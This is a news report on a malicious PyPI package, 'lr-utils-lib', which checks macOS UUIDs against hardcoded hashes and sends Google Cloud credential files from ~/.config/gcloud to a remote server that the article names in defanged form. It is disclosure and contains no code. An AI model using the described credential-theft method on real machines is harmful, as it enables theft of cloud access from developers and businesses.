Cybersecurity researchers have discovered a malicious package in the Python Package Index (PyPI) repository that targets Apple macOS systems and aims to steal users’ Google Cloud credentials from a limited number of victims.
The package, named “lr-utils-lib”, was downloaded a total of 59 times before being removed. The package was uploaded to the registry in early June 2024.
“The malware targets specific macOS machines using a predefined list of hashes in an attempt to harvest Google Cloud authentication data,” Checkmarx researcher Yehuda Gelb said in the report on Friday. “The harvested credentials are then sent to a remote server.”
The key aspect of this package is that it first checks whether it is installed on a macOS system and then compares the system’s Universally Unique Identifier (UUID) to a hardcoded list of 64 hashes.
If the compromised machine is among the machines specified in the predefined set, it will attempt to access two files in the ~/.config/gcloud directory that contain Google Cloud authentication data: application_default_credentials.json and credentials.db.
The captured information is sent via HTTP to a remote server, “europe-west2-workload-422915(.)cloudfunctions(.)net”.
Checkmarks said it also found a fake profile on LinkedIn under the name “Lucid Zenith” that matched the package’s owner and falsely claimed to be the CEO of Apex Companies, suggesting there may have been a social engineering element to the attack.
It’s currently unclear who is behind this attack, but it comes more than two months after cybersecurity firm Phylum published details of another supply-chain attack involving a Python package called “requests-darwin-lite” that was found to trigger malicious behavior after checking the UUID of a macOS host.
These campaigns indicate that threat actors have advance knowledge of the macOS systems they want to infiltrate, and go to great lengths to ensure that malicious packages are only distributed to specific machines.
It also describes tactics used by malicious actors to distribute similar packages and trick developers into including them in their applications.
“It is unclear whether this attack was targeted at individuals or businesses, but such attacks could have significant impacts on businesses,” Gelb said. “The initial compromise typically occurs on an individual developer’s machine, but the impact to a business could be significant.”
